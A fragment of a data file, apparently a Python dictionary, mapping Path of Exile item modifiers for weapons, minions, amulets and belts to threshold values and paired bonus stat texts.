"Adds # to # Lightning Damage to Dagger Attacks": [(183, '(1 - 2)% increased Attack Speed with Daggers'), (500, '3% increased Attack Speed with Daggers')],
"Adds # to # Lightning Damage to Mace Attacks": [(183, '(1 - 2)% increased Attack Speed with Maces'), (500, '3% increased Attack Speed with Maces')],
"Adds # to # Lightning Damage to Spells": [(100, '(3 - 4)% increased Lightning Damage with Spell Skills'), (300, '(5 - 6)% increased Lightning Damage with Spell Skills')],
"Adds # to # Lightning Damage to Spells while Dual Wielding": [(130, '(1 - 2)% increased Cast Speed while Dual Wielding'), (200, '3% increased Cast Speed while Dual Wielding')],
"Adds # to # Lightning Damage to Spells while holding a Shield": [(130, '(1 - 2)% increased Cast Speed while holding a Shield'), (200, '3% increased Cast Speed while holding a Shield')],
"Adds # to # Lightning Damage to Spells while wielding a Two Handed Weapon": [(130, '(1 - 2)% increased Cast Speed while wielding a Staff'), (200, '3% increased Cast Speed while wielding a Staff')],
"Adds # to # Lightning Damage to Staff Attacks": [(183, '(1 - 2)% increased Attack Speed with Staves'), (500, '3% increased Attack Speed with Staves')],
"Adds # to # Lightning Damage to Sword Attacks": [(183, '(1 - 2)% increased Attack Speed with Swords'), (500, '3% increased Attack Speed with Swords')],
"Adds # to # Lightning Damage to Wand Attacks": [(183, '(1 - 2)% increased Attack Speed with Wands'), (500, '3% increased Attack Speed with Wands')],
"Adds # to # Physical Damage to Attacks": [(16, '(3 - 4)% increased Physical Damage with Attack Skills'), (100, '(5 - 6)% increased Physical Damage with Attack Skills')],
"Adds # to # Physical Damage to Axe Attacks": [(27, '(3 - 4)% increased Physical Damage with Axes'), (100, '(5 - 6)% increased Physical Damage with Axes')],
"Adds # to # Physical Damage to Bow Attacks": [(27, '(3 - 4)% increased Physical Damage with Bows'), (100, '(5 - 6)% increased Physical Damage with Bows')],
"Adds # to # Physical Damage to Claw Attacks": [(27, '(3 - 4)% increased Physical Damage with Claws'), (100, '(5 - 6)% increased Physical Damage with Claws')],
"Adds # to # Physical Damage to Dagger Attacks": [(27, '(3 - 4)% increased Physical Damage with Daggers'), (100, '(3 - 4)% increased Physical Damage with Daggers')],
"Adds # to # Physical Damage to Mace Attacks": [(27, '(3 - 4)% increased Physical Damage with Maces'), (100, '(5 - 6)% increased Physical Damage with Maces')],
"Adds # to # Physical Damage to Spells": [(45, '(3 - 4)% increased Physical Damage with Spell Skills'), (100, '(5 - 6)% increased Physical Damage with Spell Skills')],
"Adds # to # Physical Damage to Spells while Dual Wielding": [(60, '(3 - 4)% increased Spell Damage while Dual Wielding'), (200, '(5 - 6)% increased Spell Damage while Dual Wielding')],
"Adds # to # Physical Damage to Spells while holding a Shield": [(60, '(3 - 4)% increased Spell Damage while holding a Shield'), (200, '(5 - 6)% increased Spell Damage while holding a Shield')],
"Adds # to # Physical Damage to Spells while wielding a Two Handed Weapon": [(60, '(3 - 4)% increased Spell Damage while wielding a Staff'), (200, '(5 - 6)% increased Spell Damage while wielding a Staff')],
"Adds # to # Physical Damage to Staff Attacks": [(27, '(3 - 4)% increased Physical Damage with Staves'), (100, '(5 - 6)% increased Physical Damage with Staves')],
"Adds # to # Physical Damage to Sword Attacks": [(27, '(3 - 4)% increased Physical Damage with Swords'), (100, '(5 - 6)% increased Physical Damage with Swords')],
"Adds # to # Physical Damage to Wand Attacks": [(27, '(3 - 4)% increased Physical Damage with Wands'), (100, '(5 - 6)% increased Physical Damage with Wands')],
"Damage Penetrates #% Cold Resistance": [(2, '(2 - 3)% increased Cold Damage'), (5, '(4 - 5)% increased Cold Damage')],
"Damage Penetrates #% Elemental Resistance if you haven't Killed Recently": [(4, '(2 - 3)% increased Elemental Damage'), (10, '(4 - 5)% increased Elemental Damage')],
"Damage Penetrates #% Elemental Resistances": [(2, '(2 - 3)% increased Elemental Damage'), (5, '(4 - 5)% increased Elemental Damage')],
"Damage Penetrates #% Fire Resistance": [(2, '(2 - 3)% increased Fire Damage'), (5, '(4 - 5)% increased Fire Damage')],
"Damage Penetrates #% Lightning Resistance": [(2, '(2 - 3)% increased Lightning Damage'), (5, '(4 - 5)% increased Lightning Damage')],
"Gain #% of Physical Damage as Extra Fire Damage if you've dealt a Critical Strike Recently": [(10, '(2 - 3)% increased Fire Damage'), (50, '(4 - 5)% increased Fire Damage\n3% of Physical Damage Converted to Fire Damage')],
"Minions Leech #% of Damage as Life": [(1.2, 'Minions deal (2 - 3)% increased Damage'), (5.0, 'Minions deal (4 - 5)% increased Damage')],
"Minions Regenerate # Life per second": [(30, 'Minions have (2 - 3)% increased maximum Life'), (100, 'Minions have (4 - 5)% increased maximum Life')],
"Minions Regenerate #% Life per second": [(2.0, 'Minions have (2 - 3)% increased maximum Life'), (8.33, 'Minions have (4 - 5)% increased maximum Life')],
"Minions deal # to # additional Chaos Damage": [(55, 'Minions have 3 to all Elemental Resistances'), (100, 'Minions have (4 - 5) to all Elemental Resistances')],
"Minions deal # to # additional Cold Damage": [(55, 'Minions have (2 - 3)% increased maximum Life'), (100, 'Minions have (4 - 5)% increased maximum Life')],
"Minions deal # to # additional Fire Damage": [(55, 'Minions deal (2 - 3)% increased Damage'), (100, 'Minions deal (4 - 5)% increased Damage')],
"Minions deal # to # additional Lightning Damage": [(85, '2% increased Minion Accuracy Rating'), (150, '(3 - 4)% increased Minion Accuracy Rating')],
"Minions deal # to # additional Physical Damage": [(55, 'Minions have (1 - 2)% increased Movement Speed'), (100, 'Minions have 3% increased Movement Speed')],
"Minions deal #% increased Damage against Abyssal Monsters": [(100, 'Minions deal (2 - 3)% increased Damage'), (200, 'Minions deal (4 - 5)% increased Damage')],
"Minions have #% chance to Blind on Hit with Attacks": [(15, '2% increased Minion Accuracy Rating'), (50, '(3 - 4)% increased Minion Accuracy Rating')],
"Minions have #% chance to Hinder Enemies on Hit with Spells, with 30% reduced Movement Speed": [(20, 'Minions have 3 to all Elemental Resistances'), (50, 'Minions have (4 - 5) to all Elemental Resistances')],
"Minions have #% chance to Taunt on Hit with Attacks": [(20, '2% increased Minion Accuracy Rating'), (50, '(3 - 4)% increased Minion Accuracy Rating')],
"Minions have #% increased Attack Speed": [(15, 'Minions have (1 - 2)% increased Attack Speed'), (50, 'Minions have 3% increased Attack Speed')],
"Minions have #% increased Attack and Cast Speed if you or your Minions have Killed Recently": [(21, 'Minions have (1 - 2)% increased Attack Speed\nMinions have (1 - 2)% increased Cast Speed'), (50, 'Minions have 3% increased Attack Speed\nMinions have 3% increased Cast Speed')],
"Minions have #% increased Cast Speed": [(15, 'Minions have (1 - 2)% increased Cast Speed'), (50, 'Minions have 3% increased Cast Speed')],
"Minions have #% increased Movement Speed": [(24, 'Minions have (1 - 2)% increased Movement Speed'), (100, 'Minions have 3% increased Movement Speed')],
"Minions have #% increased maximum Life": [(30, 'Minions have (2 - 3)% increased maximum Life'), (100, 'Minions have (4 - 5)% increased maximum Life')],
"Minions have +#% to Chaos Resistance": [(27, 'Minions have 3 to all Elemental Resistances'), (100, 'Minions have (4 - 5) to all Elemental Resistances')],
"Minions have +#% to all Elemental Resistances": [(25, 'Minions have 3 to all Elemental Resistances'), (100, 'Minions have (4 - 5) to all Elemental Resistances')],
},
"Amulet": {
"# Life Regenerated per second": [(25.0, '(0.6 - 0.7)% of Life Regenerated per second'), (41.67, '(0.8 - 0.93)% of Life Regenerated per second'), (58.33, '1.0% of Life Regenerated per second'), (83.33, '1.0% of Life Regenerated per second\n(80.0 - 100.0) Life Regenerated per second')],
"#% Chance to Trigger Level 18 Summon Spectral Wolf on Kill": [(11, 'Minions deal (11 - 12)% increased Damage'), (22, 'Minions deal (13 - 14)% increased Damage'), (50, 'Minions deal (15 - 16)% increased Damage')],
"#% chance to Recover 10% of Maximum Mana when you use a Skill": [(11, '(2.0 - 2.5) Mana Regenerated per second'), (22, '(2.52 - 3.0) Mana Regenerated per second'), (50, '(3.02 - 4.0) Mana Regenerated per second\n0.5% of Mana Regenerated per second')],
"#% chance when Hit for double Armour effect": [(25, '(7 - 9)% increased Armour'), (50, '(10 - 12)% increased Armour'), (100, '(13 - 15)% increased Armour\nDetermination has (15 - 20)% increased Aura Effect')],
"#% increased Area Damage": [(20, '(10 - 12)% increased Area Damage'), (40, '(13 - 15)% increased Area Damage'), (100, '(9 - 10)% increased Area of Effect')],
"#% increased Armour": [(20, '(7 - 9)% increased Armour'), (40, '(10 - 12)% increased Armour'), (55, '(13 - 15)% increased Armour'), (100, '(13 - 15)% increased Armour\n(1 - 2) to maximum Chance to Block Attack Damage\n(1 - 2) to maximum Chance to Block Spell Damage')],
"#% increased Attack and Cast Speed": [(15, '4% increased Attack and Cast Speed'), (50, '5% increased Attack and Cast Speed')],
"#% increased Brand Attachment range": [(30, '(2 - 3)% increased Brand Attachment range'), (100, '(4 - 5)% increased Brand Attachment range')],
"#% increased Cast Speed": [(20, '3% increased Cast Speed'), (35, '4% increased Cast Speed'), (100, '5% increased Cast Speed')],
"#% increased Chaos Damage": [(20, '8% increased Chaos Damage'), (40, '(9 - 10)% increased Chaos Damage'), (60, '(11 - 12)% increased Chaos Damage'), (80, '(13 - 14)% increased Chaos Damage'), (200, '(15 - 16)% increased Chaos Damage')],
"#% increased Cold Damage": [(20, '8% increased Cold Damage'), (40, '(9 - 10)% increased Cold Damage'), (60, '(11 - 12)% increased Cold Damage'), (80, '(13 - 14)% increased Cold Damage'), (200, '(15 - 16)% increased Cold Damage\nDamage Penetrates (3 - 5)% Cold Resistance')],
"#% increased Damage while Leeching": [(100, '(10 - 12)% increased Damage while Leeching'), (200, '(13 - 15)% increased Damage while Leeching')],
"#% increased Damage with Ailments": [(30, '8% increased Damage with Ailments'), (60, '(9 - 10)% increased Damage with Ailments'), (90, '(11 - 12)% increased Damage with Ailments'), (105, '(13 - 14)% increased Damage with Ailments'), (200, '(15 - 16)% increased Damage with Ailments')],
"#% increased Effect of Fortify on you": [(20, '250 to Armour and Evasion Rating while you have Fortify'), (40, '500 to Armour and Evasion Rating while you have Fortify'), (100, '800 to Armour and Evasion Rating while you have Fortify')],
"#% increased Elemental Damage with Attack Skills": [(40, '(12 - 13)% increased Elemental Damage with Attack Skills'), (80, '(14 - 15)% increased Elemental Damage with Attack Skills'), (115, '(16 - 18)% increased Elemental Damage with Attack Skills'), (130, '(19 - 21)% increased Elemental Damage with Attack Skills'), (200, '(22 - 24)% increased Elemental Damage with Attack Skills\nDamage Penetrates (3 - 5)% Elemental Resistances')],
"#% increased Energy Shield from Body Armour": [(20, '(8 - 9)% increased Energy Shield Recharge Rate'), (40, '(10 - 11)% increased Energy Shield Recharge Rate'), (100, '(12 - 15)% increased Energy Shield Recharge Rate\nDiscipline has (15 - 20)% increased Aura Effect')],
"#% increased Evasion Rating": [(20, '(7 - 9)% increased Evasion Rating'), (40, '(10 - 12)% increased Evasion Rating'), (55, '(13 - 15)% increased Evasion Rating'), (100, '(13 - 15)% increased Evasion Rating\n(1 - 2) to maximum Chance to Dodge Attack Hits\n(1 - 2) to maximum Chance to Dodge Spell Hits')],
"#% increased Fire Damage": [(20, '8% increased Fire Damage'), (40, '(9 - 10)% increased Fire Damage'), (60, '(11 - 12)% increased Fire Damage'), (80, '(13 - 14)% increased Fire Damage'), (200, '(15 - 16)% increased Fire Damage\nDamage Penetrates (3 - 5)% Fire Resistance')],
"#% increased Global Critical Strike Chance": [(40, '(14 - 15)% increased Global Critical Strike Chance'), (70, '(16 - 17)% increased Global Critical Strike Chance'), (90, '(18 - 20)% increased Global Critical Strike Chance'), (105, '(21 - 23)% increased Global Critical Strike Chance'), (300, '(24 - 26)% increased Global Critical Strike Chance')],
"#% increased Global Physical Damage": [(20, '8% increased Global Physical Damage'), (40, '(9 - 10)% increased Global Physical Damage'), (60, '(11 - 12)% increased Global Physical Damage'), (80, '(13 - 14)% increased Global Physical Damage'), (200, '(15 - 16)% increased Global Physical Damage')],
"#% increased Life Recovery from Flasks": [(40, '4% increased maximum Life'), (80, '(5 - 6)% increased maximum Life'), (200, '(7 - 8)% increased maximum Life\n(80.0 - 100.0) Life Regenerated per second')],
"#% increased Lightning Damage": [(20, '8% increased Lightning Damage'), (40, '(9 - 10)% increased Lightning Damage'), (60, '(11 - 12)% increased Lightning Damage'), (80, '(13 - 14)% increased Lightning Damage'), (200, '(15 - 16)% increased Lightning Damage\nDamage Penetrates (3 - 5)% Lightning Resistance')],
"#% increased Mana Recovery rate": [(15, '(22 - 24)% increased Mana Regeneration Rate'), (30, '(25 - 27)% increased Mana Regeneration Rate'), (100, '(28 - 30)% increased Mana Regeneration Rate\n0.5% of Mana Regenerated per second')],
"#% increased Mana Regeneration Rate": [(75, '(2.0 - 2.5) Mana Regenerated per second'), (150, '(2.52 - 3.0) Mana Regenerated per second'), (190, '(3.02 - 4.0) Mana Regenerated per second'), (500, '(3.02 - 4.0) Mana Regenerated per second\n0.5% of Mana Regenerated per second')],
"#% increased Melee Damage": [(20, '(10 - 12)% increased Melee Damage'), (40, '(13 - 15)% increased Melee Damage'), (100, '1 to Melee Weapon and Unarmed Attack range')],
"#% increased Mine Laying Speed": [(30, '(2 - 3)% increased Mine Laying Speed'), (100, '(4 - 5)% increased Mine Laying Speed')],
"#% increased Projectile Damage": [(20, '(10 - 12)% increased Projectile Damage'), (40, '(13 - 15)% increased Projectile Damage'), (100, '(18 - 20)% increased Projectile Speed')],
"#% increased Rarity of Items found": [(30, '(10 - 11)% increased Rarity of Items found'), (60, '(12 - 13)% increased Rarity of Items found'), (90, '(14 - 15)% increased Rarity of Items found'), (120, '(16 - 17)% increased Rarity of Items found'), (145, '(18 - 20)% increased Rarity of Items found'), (200, '(4 - 5)% increased Movement Speed')],
"#% increased Spell Damage": [(50, '(19 - 22)% increased Spell Damage'), (70, '(23 - 26)% increased Spell Damage'), (150, '(27 - 30)% increased Spell Damage')],
"#% increased Totem Placement speed": [(75, '(2 - 3)% increased Totem Placement speed'), (150, '(4 - 5)% increased Totem Placement speed')],
"#% increased Trap Throwing Speed": [(30, '(2 - 3)% increased Trap Throwing Speed'), (100, '(4 - 5)% increased Trap Throwing Speed')],
"#% increased Vaal Skill Effect Duration": [(35, '(5 - 8)% increased Vaal Skill Effect Duration'), (70, '(9 - 12)% increased Vaal Skill Effect Duration'), (200, '(6 - 8)% increased maximum Life if Corrupted\n(8 - 10)% increased maximum Energy Shield if Corrupted')],
"#% increased maximum Energy Shield": [(20, '(8 - 9)% increased Energy Shield Recharge Rate'), (40, '(10 - 11)% increased Energy Shield Recharge Rate'), (55, '(12 - 15)% increased Energy Shield Recharge Rate'), (100, '(12 - 15)% increased Energy Shield Recharge Rate\n(5 - 3)% reduced Mana Reserved')],
"#% increased total Recovery per second from Life Leech": [(50, '(8 - 10)% increased total Recovery per second from Life Leech'), (100, '(11 - 13)% increased total Recovery per second from Life Leech'), (200, '(14 - 16)% increased total Recovery per second from Life Leech\n10% increased Maximum total Recovery per second from Life Leech')],
"#% of Chaos Damage Leeched as Life": [(0.6, '(11 - 12)% increased Chaos Damage'), (1.2, '(13 - 14)% increased Chaos Damage'), (2.0, '(15 - 16)% increased Chaos Damage\n0.5% of Chaos Damage Leeched as Life')],
"#% of Damage taken gained as Mana over 4 seconds when Hit": [(8, '(2.0 - 2.5) Mana Regenerated per second'), (16, '(2.52 - 3.0) Mana Regenerated per second'), (50, '(3.02 - 4.0) Mana Regenerated per second')],
"#% of Life Regenerated per second": [(1.17, '(11.68 - 18.33) Life Regenerated per second'), (2.33, '(18.35 - 26.67) Life Regenerated per second'), (5.0, '(26.68 - 40.0) Life Regenerated per second\n(0.6 - 0.7)% of Life Regenerated per second')],
"#% of Physical Attack Damage Leeched as Life": [(0.4, '0.2% of Physical Attack Damage Leeched as Life'), (0.7, '0.3% of Physical Attack Damage Leeched as Life'), (1.0, '0.4% of Physical Attack Damage Leeched as Life'), (4.0, '0.4% of Physical Attack Damage Leeched as Life\n10% increased Maximum total Recovery per second from Life Leech')],
"#% of Physical Attack Damage Leeched as Mana": [(0.4, '0.1% of Physical Attack Damage Leeched as Mana'), (0.7, '0.2% of Physical Attack Damage Leeched as Mana'), (1.0, '0.3% of Physical Attack Damage Leeched as Mana'), (4.0, '0.3% of Physical Attack Damage Leeched as Mana\n10% increased Maximum total Recovery per second from Mana Leech')],
"#% reduced Mana Cost of Skills": [(10, '2% reduced Mana Cost of Skills'), (20, '3% reduced Mana Cost of Skills'), (50, '(4 - 5)% reduced Mana Cost of Skills')],
"+# Life gained for each Enemy hit by your Attacks": [(4, '(4 - 5) Life gained for each Enemy hit by your Attacks'), (7, '(6 - 8) Life gained for each Enemy hit by your Attacks'), (10, '(9 - 15) Life gained for each Enemy hit by your Attacks'), (15, '(9 - 15) Life gained for each Enemy hit by your Attacks')],
"+# Life gained on Kill": [(15, '(6 - 8) Life gained on Kill'), (25, '(9 - 11) Life gained on Kill'), (35, '(12 - 15) Life gained on Kill'), (100, '(12 - 15) Life gained on Kill\nRecover (1 - 2)% of Maximum Life on Kill')],
"+# Mana gained on Kill": [(5, '3 Mana gained on Kill'), (10, '4 Mana gained on Kill'), (15, '5 Mana gained on Kill'), (50, '5 Mana gained on Kill\nRecover (1 - 2)% of Maximum Mana on Kill')],
"+# to Accuracy Rating": [(250, '(10 - 11)% increased Global Accuracy Rating'), (500, '(12 - 13)% increased Global Accuracy Rating'), (750, '(14 - 15)% increased Global Accuracy Rating'), (1000, '(16 - 17)% increased Global Accuracy Rating'), (1400, '(18 - 20)% increased Global Accuracy Rating'), (2000, '(18 - 20)% increased Global Accuracy Rating\n(150 - 250) to Accuracy Rating')],
"+# to Dexterity": [(100, '(7 - 9)% increased Dexterity'), (130, '(10 - 12)% increased Dexterity'), (160, '(13 - 15)% increased Dexterity'), (200, '(13 - 15)% increased Dexterity\n1% increased Damage per 15 Dexterity')],
"+# to Dexterity and Intelligence": [(20, '(6 - 8) to Dexterity\n(6 - 8) to Intelligence'), (45, '(9 - 11) to Dexterity\n(9 - 11) to Intelligence'), (100, '(12 - 14) to Dexterity\n(12 - 14) to Intelligence')],
"+# to Intelligence": [(100, '(7 - 9)% increased Intelligence'), (130, '(10 - 12)% increased Intelligence'), (160, '(13 - 15)% increased Intelligence'), (200, '(13 - 15)% increased Intelligence\n1% increased Damage per 15 Intelligence')],
"+# to Minimum Endurance Charges": [(1, '(8 - 11)% increased Endurance Charge Duration'), (2, '(12 - 15)% increased Endurance Charge Duration'), (5, '(3 - 4)% increased Damage per Endurance Charge')],
"+# to Minimum Frenzy Charges": [(1, '(8 - 11)% increased Frenzy Charge Duration'), (2, '(12 - 15)% increased Frenzy Charge Duration'), (5, '(3 - 4)% increased Damage per Frenzy Charge')],
"+# to Minimum Power Charges": [(1, '(8 - 11)% increased Power Charge Duration'), (2, '(12 - 15)% increased Power Charge Duration'), (5, '(3 - 4)% increased Damage per Power Charge')],
"+# to Strength": [(100, '(7 - 9)% increased Strength'), (130, '(10 - 12)% increased Strength'), (160, '(13 - 15)% increased Strength'), (200, '(13 - 15)% increased Strength\n1% increased Damage per 15 Strength')],
"+# to Strength and Dexterity": [(20, '(6 - 8) to Strength\n(6 - 8) to Dexterity'), (45, '(9 - 11) to Strength\n(9 - 11) to Dexterity'), (100, '(12 - 14) to Strength\n(12 - 14) to Dexterity')],
"+# to Strength and Intelligence": [(20, '(6 - 8) to Strength\n(6 - 8) to Intelligence'), (45, '(9 - 11) to Strength\n(9 - 11) to Intelligence'), (100, '(12 - 14) to Strength\n(12 - 14) to Intelligence')],
"+# to Total Mana Cost of Skills": [(12, '-1 to Total Mana Cost of Skills'), (24, '-2 to Total Mana Cost of Skills'), (50, '-3 to Total Mana Cost of Skills')],
"+# to all Attributes": [(30, '4% increased Strength\n4% increased Dexterity\n4% increased Intelligence'), (60, '5% increased Strength\n5% increased Dexterity\n5% increased Intelligence'), (95, '6% increased Strength\n6% increased Dexterity\n6% increased Intelligence'), (200, '6% increased Strength\n6% increased Dexterity\n6% increased Intelligence\n(4 - 5)% increased Damage per Endurance Charge\n(4 - 5)% increased Damage per Frenzy Charge\n(4 - 5)% increased Damage per Power Charge')],
"+# to maximum Energy Shield": [(50, '(4 - 5)% increased maximum Energy Shield'), (100, '(6 - 7)% increased maximum Energy Shield'), (130, '(8 - 10)% increased maximum Energy Shield'), (500, '(8 - 10)% increased maximum Energy Shield\n10% increased Maximum total Recovery per second from Energy Shield Leech')],
"+# to maximum Life": [(200, '4% increased maximum Life'), (230, '(5 - 6)% increased maximum Life'), (1000, '(7 - 8)% increased maximum Life')],
"+# to maximum Mana": [(100, '6% increased maximum Mana'), (200, '(7 - 8)% increased maximum Mana'), (500, '(9 - 10)% increased maximum Mana')],
"+#% chance to Evade Attacks": [(3, '(7 - 9)% increased Evasion Rating'), (5, '(10 - 12)% increased Evasion Rating'), (10, '(13 - 15)% increased Evasion Rating\nGrace has (15 - 20)% increased Aura Effect')],
"+#% to Chaos Resistance": [(100, '(9 - 10) to Chaos Resistance'), (120, '(9 - 10) to Chaos Resistance\n3% reduced Damage taken from Damage Over Time')],
"+#% to Cold Resistance": [(50, '(11 - 12) to Cold Resistance'), (100, '(13 - 14) to Cold Resistance'), (140, '(15 - 16) to Cold Resistance'), (150, '(15 - 16) to Cold Resistance\nPurity of Ice has (40 - 30)% reduced Mana Reservation')],
"+#% to Cold and Chaos Resistances": [(35, '8 to Cold Resistance\n(5 - 6) to Chaos Resistance'), (100, '(9 - 10) to Cold Resistance\n(7 - 8) to Chaos Resistance')],
"+#% to Cold and Lightning Resistances": [(20, '8 to Cold Resistance\n8 to Lightning Resistance'), (40, '(9 - 10) to Cold Resistance\n(9 - 10) to Lightning Resistance'), (100, '(11 - 12) to Cold Resistance\n(11 - 12) to Lightning Resistance')],
"+#% to Fire Resistance": [(50, '(11 - 12) to Fire Resistance'), (100, '(13 - 14) to Fire Resistance'), (140, '(15 - 16) to Fire Resistance'), (150, '(15 - 16) to Fire Resistance\nPurity of Fire has (40 - 30)% reduced Mana Reservation')],
"+#% to Fire and Chaos Resistances": [(35, '8 to Fire Resistance\n(5 - 6) to Chaos Resistance'), (100, '(9 - 10) to Fire Resistance\n(7 - 8) to Chaos Resistance')],
"+#% to Fire and Cold Resistances": [(20, '8 to Fire Resistance\n8 to Cold Resistance'), (40, '(9 - 10) to Fire Resistance\n(9 - 10) to Cold Resistance'), (100, '(11 - 12) to Fire Resistance\n(11 - 12) to Cold Resistance')],
"+#% to Fire and Lightning Resistances": [(20, '8 to Fire Resistance\n8 to Lightning Resistance'), (40, '(9 - 10) to Fire Resistance\n(9 - 10) to Lightning Resistance'), (100, '(11 - 12) to Fire Resistance\n(11 - 12) to Lightning Resistance')],
"+#% to Global Critical Strike Multiplier": [(40, '12 to Global Critical Strike Multiplier'), (70, '(13 - 14) to Global Critical Strike Multiplier'), (90, '(15 - 16) to Global Critical Strike Multiplier'), (105, '(17 - 18) to Global Critical Strike Multiplier'), (300, '(19 - 20) to Global Critical Strike Multiplier')],
"+#% to Lightning Resistance": [(50, '(11 - 12) to Lightning Resistance'), (100, '(13 - 14) to Lightning Resistance'), (140, '(15 - 16) to Lightning Resistance'), (150, '(15 - 16) to Lightning Resistance\nPurity of Lightning has (40 - 30)% reduced Mana Reservation')],
"+#% to Lightning and Chaos Resistances": [(35, '8 to Lightning Resistance\n(5 - 6) to Chaos Resistance'), (100, '(9 - 10) to Lightning Resistance\n(7 - 8) to Chaos Resistance')],
"+#% to all Elemental Resistances": [(15, '(11 - 12) to Fire Resistance\n(11 - 12) to Cold Resistance\n(11 - 12) to Lightning Resistance'), (30, '(13 - 14) to Fire Resistance\n(13 - 14) to Cold Resistance\n(13 - 14) to Lightning Resistance'), (45, '(15 - 16) to Fire Resistance\n(15 - 16) to Cold Resistance\n(15 - 16) to Lightning Resistance'), (100, '(15 - 16) to Fire Resistance\n(15 - 16) to Cold Resistance\n(15 - 16) to Lightning Resistance\n1 to all maximum Resistances')],
"Adds # to # Chaos Damage to Attacks": [(40, '(11 - 12)% increased Chaos Damage'), (75, '(13 - 14)% increased Chaos Damage'), (200, '(15 - 16)% increased Chaos Damage')],
"Adds # to # Cold Damage to Attacks": [(30, '(11 - 12)% increased Cold Damage'), (60, '(13 - 14)% increased Cold Damage'), (90, '(15 - 16)% increased Cold Damage'), (105, '(15 - 16)% increased Cold Damage\n0.5% of Cold Damage Leeched as Life')],
"Adds # to # Fire Damage to Attacks": [(40, '(11 - 12)% increased Fire Damage'), (80, '(13 - 14)% increased Fire Damage'), (120, '(15 - 16)% increased Fire Damage'), (200, '(15 - 16)% increased Fire Damage\n0.5% of Fire Damage Leeched as Life')],
"Adds # to # Lightning Damage to Attacks": [(75, '(11 - 12)% increased Lightning Damage'), (150, '(13 - 14)% increased Lightning Damage'), (190, '(15 - 16)% increased Lightning Damage'), (300, '(15 - 16)% increased Lightning Damage\n0.5% of Lightning Damage Leeched as Life')],
"Adds # to # Physical Damage to Attacks": [(20, '(11 - 12)% increased Global Physical Damage'), (30, '(13 - 14)% increased Global Physical Damage'), (70, '(15 - 16)% increased Global Physical Damage'), (100, '(15 - 16)% increased Global Physical Damage\n0.5% of Physical Damage Leeched as Life')],
"Cannot be Chilled or Frozen while moving": [(1, '(14 - 16)% chance to Avoid being Chilled\n(13 - 14)% chance to Avoid being Frozen'), (2, '(18 - 21)% chance to Avoid being Chilled\n(15 - 17)% chance to Avoid being Frozen'), (5, '(22 - 25)% chance to Avoid being Chilled\n(18 - 20)% chance to Avoid being Frozen')],
"Damage Penetrates #% Elemental Resistances": [(6, '(17 - 19)% increased Elemental Damage'), (12, '(20 - 22)% increased Elemental Damage'), (50, '(23 - 26)% increased Elemental Damage')],
"Minions have #% increased Movement Speed": [(40, 'Minions have (4 - 5)% increased Movement Speed'), (75, 'Minions have (6 - 7)% increased Movement Speed'), (200, 'Minions have (8 - 10)% increased Movement Speed')],
"Skills Cost no Mana while Focussed": [(2, '-1 to Total Mana Cost of Skills\n2% reduced Mana Cost of Skills'), (5, '-2 to Total Mana Cost of Skills\n3% reduced Mana Cost of Skills')],
"You have Vaal Pact while Focussed": [(1, '(10 - 12)% increased Damage while Leeching'), (2, '(13 - 15)% increased Damage while Leeching'), (5, '0.5% of Fire Damage Leeched as Life\n0.5% of Cold Damage Leeched as Life\n0.5% of Lightning Damage Leeched as Life\n0.5% of Physical Damage Leeched as Life\n0.5% of Chaos Damage Leeched as Life')],
},
"Belt": {
"# Energy Shield Regenerated per second while a Rare or Unique Enemy is Nearby": [(333.33, '(0.6 - 0.7)% of Energy Shield Regenerated per second'), (416.67, '(0.8 - 0.9)% of Energy Shield Regenerated per second')],
"# Life Regenerated per second": [(16.67, '(5.0 - 7.0) Life Regenerated per second'), (29.17, '(7.02 - 11.67) Life Regenerated per second'), (41.67, '(11.68 - 18.33) Life Regenerated per second'), (50.0, '(18.35 - 26.67) Life Regenerated per second'), (54.17, '(26.68 - 40.0) Life Regenerated per second\n(0.6 - 0.7)% of Life Regenerated per second'), (58.33, '(26.68 - 40.0) Life Regenerated per second\n(0.8 - 0.93)% of Life Regenerated per second'), (83.33, '(26.68 - 40.0) Life Regenerated per second\n1.0% of Life Regenerated per second')],
"#% additional Physical Damage Reduction during any Flask Effect": [(6, '(-15 - -11) Physical Damage taken from Attacks'), (12, '(-20 - -16) Physical Damage taken from Attacks'), (50, '(-25 - -21) Physical Damage taken from Attacks')],
"#% chance for your Flasks to not consume Charges": [(10, '(11 - 10)% reduced Flask Charges used'), (20, '(13 - 12)% reduced Flask Charges used'), (50, '(15 - 14)% reduced Flask Charges used')],
"#% chance to Avoid being Frozen": [(50, '(13 - 14)% chance to Avoid being Frozen'), (110, '(15 - 17)% chance to Avoid being Frozen'), (200, '(18 - 20)% chance to Avoid being Frozen')],
"#% chance to Avoid being Ignited": [(45, '(13 - 14)% chance to Avoid being Ignited'), (90, '(15 - 17)% chance to Avoid being Ignited'), (200, '(18 - 20)% chance to Avoid being Ignited')],
"#% chance to Avoid being Shocked": [(50, '(13 - 14)% chance to Avoid being Shocked'), (110, '(15 - 17)% chance to Avoid being Shocked'), (200, '(18 - 20)% chance to Avoid being Shocked')],
"#% chance to gain Onslaught when you use a Flask": [(25, '3% increased Attack and Cast Speed'), (50, '4% increased Attack and Cast Speed'), (100, '5% increased Attack and Cast Speed\n(5 - 8)% chance to gain Onslaught for 4 seconds on Kill')],
"#% chance when Hit for double Armour effect": [(25, '(7 - 9)% increased Armour'), (50, '(10 - 12)% increased Armour'), (100, '(13 - 15)% increased Armour\nYou take (15 - 25)% reduced Extra Damage from Critical Strikes')],
"#% increased Chaos Damage": [(20, '(9 - 10)% increased Chaos Damage'), (40, '(11 - 12)% increased Chaos Damage'), (60, '(13 - 14)% increased Chaos Damage'), (80, '(15 - 16)% increased Chaos Damage'), (200, '(17 - 20)% increased Chaos Damage')],
"#% increased Cold Damage": [(20, '(9 - 10)% increased Cold Damage'), (40, '(11 - 12)% increased Cold Damage'), (60, '(13 - 14)% increased Cold Damage'), (80, '(15 - 16)% increased Cold Damage'), (200, '(17 - 20)% increased Cold Damage')],
"#% increased Damage": [(25, '(10 - 11)% increased Damage'), (55, '(12 - 13)% increased Damage'), (100, '(14 - 15)% increased Damage')],
"#% increased Damage with Ailments": [(30, '8% increased Damage with Ailments'), (60, '(9 - 10)% increased Damage with Ailments'), (90, '(11 - 12)% increased Damage with Ailments'), (105, '(13 - 14)% increased Damage with Ailments'), (200, '(15 - 16)% increased Damage with Ailments')],
"#% increased Effect of Flasks on you": [(20, '(10 - 11)% increased Flask Effect Duration'), (35, '(12 - 13)% increased Flask Effect Duration'), (100, '(14 - 15)% increased Flask Effect Duration')],
